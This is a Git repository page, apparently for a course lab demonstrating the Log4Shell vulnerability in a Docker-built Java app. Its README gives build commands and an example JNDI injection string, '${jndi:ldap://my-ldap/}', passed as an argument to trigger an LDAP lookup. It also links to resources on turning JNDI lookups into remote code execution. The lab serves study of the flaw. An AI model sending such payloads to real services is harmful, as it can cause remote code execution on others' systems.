You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
|
5 months ago | |
---|---|---|
attacker | 5 months ago | |
bin/main | 5 months ago | |
gradle/wrapper | 5 months ago | |
hackers | 5 months ago | |
res | 5 months ago | |
src | 5 months ago | |
.dockerignore | 5 months ago | |
.gitignore | 5 months ago | |
Dockerfile | 5 months ago | |
LICENSE | 6 months ago | |
README.md | 5 months ago | |
build.gradle.kts | 5 months ago | |
gradlew | 5 months ago | |
settings.gradle.kts | 5 months ago |
README.md
SR2I203
Log4Shell
Usage
To run this app, you need to install docker, then run :
docker build -t app . docker run app my-arg
For example you can now try to inject some jndi script:
docker run app '${jndi:ldap://my-ldap/}'
Overview Resources
- Base repo
- LiveOverflow:
- A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land
- Flow Diagram
- Impact